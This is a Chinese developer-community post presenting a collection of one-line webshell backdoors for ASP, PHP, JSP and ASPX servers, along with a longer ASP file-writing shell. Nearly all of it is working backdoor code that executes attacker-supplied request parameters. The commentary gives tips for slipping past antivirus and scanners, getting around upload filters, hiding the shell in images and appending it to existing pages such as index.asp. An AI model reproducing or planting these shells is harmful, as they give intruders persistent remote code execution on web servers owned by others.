开发者社区> thinkyoung> 正文
阿里云
为了无法计算的价值
打开APP
阿里云APP内打开

各种一句话木马大全

简介: %>
+关注继续查看

<%eval request("c")%> 
<%execute request("c")%> 
<%execute(request("c"))%> 
<%ExecuteGlobal request("sb")%> 
%><%Eval(Request(chr(35)))%><% 
<%if request ("c")<>""then session("c")=request("c"):end if:if session("c")<>"" then execute session("c")%> 
<%eval(Request.Item["c"],"unsafe");%> 
'备份专用 
<%eval(request("c")):response.end%> 
'无防下载表,有防下载表突破专用一句话 
<%execute request("c")%><%<%loop<%:%> 
<%<%loop<%:%><%execute request("c")%> 
<%execute request("c")<%loop<%:%> 
'防杀防扫专用 
<%if Request("c")<>"" ThenExecuteGlobal(Request("c"))%> 
'不用"<,>" 
<script language=VBScript runat=server>execute request("c")</script> 
<% @Language="JavaScript" CodePage="65001"var lcx={'名字':Request.form('#'),'性别':eval,'年龄':'18','昵称':'请叫我一声老大'};lcx.性别((lcx. 
名字)+'') %> 
<script language=vbs runat=server>eval(request("c"))</script> 
<script language=vbs runat=server>eval_r(request("c"))</script> 
'不用双引号 
<%eval request(chr(35))%> 
'可以躲过雷客图 
<%set ms = server.CreateObject("MSScriptControl.ScriptControl.1") ms.Language="VBScript" ms.AddObject"response",response ms.AddObject 

"request",request ms.ExecuteStatement("ev"&"al(request(""c""))")%> 
<%dy=request("dy")%><%Eval(dy)%> 
'容错代码 
if Request("sb")<>"" then ExecuteGlobal request("sb") end if 
PHP一句话 

复制代码代码如下:

<?php eval($_POST1);?> 
<?php if(isset($_POST['c'])){eval($_POST['c']);}?> 
<?php system($_REQUEST1);?> 
<?php ($_=@$_GET1).@$_($_POST1)?> 
<?php eval_r($_POST1)?> 
<?php @eval_r($_POST1)?>//容错代码 
<?php assert($_POST1);?>//使用Lanker一句话客户端的专家模式执行相关的PHP语句 
<?$_POST['c']($_POST['cc']);?> 
<?$_POST['c']($_POST['cc'],$_POST['cc'])?> 
<?php @preg_replace("/[email]/e",$_POST['h'],"error");?>/*使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入*/:<O>h=@eval_r($_POST1);</O> 
<?php echo `$_GET['r']` ?> 
//绕过<?限制的一句话 
<script language="php">@eval_r($_POST[sb])</script> 


JSP一句话 

复制代码代码如下:

<%if(request.getParameter("f")!=null)(newjava.io.FileOutputStream (application.getRealPath("\\")+request.getParameter("f"))).write (request.getParameter("t").getBytes());%> 
提交客户端 
<form action="" method="post"><textareaname="t"></textarea><br/><input type="submit"value="提交"></form> 
ASPX一句话 
<script language="C#"runat="server">WebAdmin2Y.x.y a=new WebAdmin2Y.x.y("add6bb58e139be10")</script> 

再补充几个:

推荐还是把一句话加进图片里面去。 
普通的php一句话:<?php @eval($_POST['r00ts']);?> 
普通的asp一句话:<%eval(Request.Item["r00ts"],”unsafe”);%> 
aspx突破一流的: 
[code] 
dim da 
set fso=server.createobject("scripting.filesystemobject") 
path=request("path") 
if path<>"" then 
data=request("da") 
set da=fso.createtextfile(path,true) 
da.write data 
if err=0 then 
Response.Write "yes" 
else 
Response.Write "no" 
end if 
err.clear 
end if 
set da=nothing 
set fos=nothing 
Response.Write "<form action=" method=post>" 
Response.Write "<input type=text name=path>" 
Response.Write "<br>" 
Response.Write "当前文件路径:"&server.mappath(request.servervariables("script_name")) 
Response.Write "<br>" 
Response.Write "操作系统为:"&Request.ServerVariables("OS") 
Response.Write "<br>" 
Response.Write "WEB服务器版本为:"&Request.ServerVariables("SERVER_SOFTWARE") 
Response.Write "<br>" 
Response.Write "<textarea name=da cols=50 rows=10 width=30></textarea>" 
Response.Write "<br>" 
Response.Write "<input type=submit value=save>" 
Response.Write "</form>" 
</Script> 


ASP一句话:<%IfRequest(“1″)<>”"ThenExecuteGlobal(Request(“1″))%> 

PHP防杀放扫 一句话:<?php (])?> 
上面这句是防杀防扫的!网上很少人用!可以插在网页任何ASP文件的最底部不会出错,比如 
index.asp里面也是可以的! 

因为加了判断!加了判断的PHP一句话,与上面的ASP一句话相同道理,也是可以插在任何PHP文件 
的最底部不会出错!<?if(isset($_POST['1'])){eval($_POST['1']);}?><?php system 
($_REQUEST[1]);?> 

无防下载表,有防下载表可尝试插入以下语句突破的一句话 
<%execute request(“class”)%><%'<% loop <%:%><%'<% loop <%:%><%execute request 
(“class”)%><%execute request(“class”)'<% loop <%:%> 

备份专用<%eval(request(“1″)):response.end%> 

asp一句话<%execute(request(“1″))%> 
aspx一句话:<scriptrunat=”server”>WebAdmin2Y.x.y aaaaa =newWebAdmin2Y.x.y 
(“add6bb58e139be10″);</script> 

可以躲过雷客图的一句话。 
<%set ms = server.CreateObject(“MSScriptControl.ScriptControl.1″) 
ms.Language=”VBScript”ms.AddObject”Response”,Responsems.AddObject”request”, 
requestms.ExecuteStatement(“ev”&”al(request(“”1″”))”)%> 

不用'<,>‘的asp一句话<scriptrunat=server>execute request(“1″)</script> 

不用双引号的一句话。<%eval request(chr(35))%>

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

相关文章
vi常用快捷键
进入vi的命令 vi filename :打开或新建文件,并将光标置于第一行首 vi +n filename :打开文件,并将光标置于第n行首 vi + filename :打开文件,并将光标置于最后一行首 vi +/pattern filename:打开文件,并将光标置于第一个与pattern匹配的串处 vi -r filename :在上次正用vi编辑时发生系统崩溃
1121 0
常用正则表达式大全
1. 用户名正则表达式模式 ^[a-z0-9_-]{3,15}$ ^ # 行开始 [a-z0-9_-] # 匹配列表中的字符,a-z,0–9,下划线,连字符 {3,15} ...
805 0
正则表达式整理大全
C#正则表达式小结 以下是一些常用的正则表达式,觉得实用就收藏一下吧。 只能输入数字:"^[0-9]*$"。 只能输入n位的数字:"^\d{n}$"。 只能输入至少n位的数字:"^\d{n,}$"。
703 0
木马的危害性
通过媒体的广泛宣传报道,使我们知道了木马的危害性,一个功能强大的木马一旦被植入你的机器,攻击者就可以象操作自己的机器一样控制你的机器,甚至可以远程监控你的所有操作。
804 0
+关注
722
文章
0
问答
文章排行榜
最热
最新
相关电子书
更多
低代码开发师(初级)实战教程
立即下载
阿里巴巴DevOps 最佳实践手册
立即下载
冬季实战营第三期:MySQL数据库进阶实战
立即下载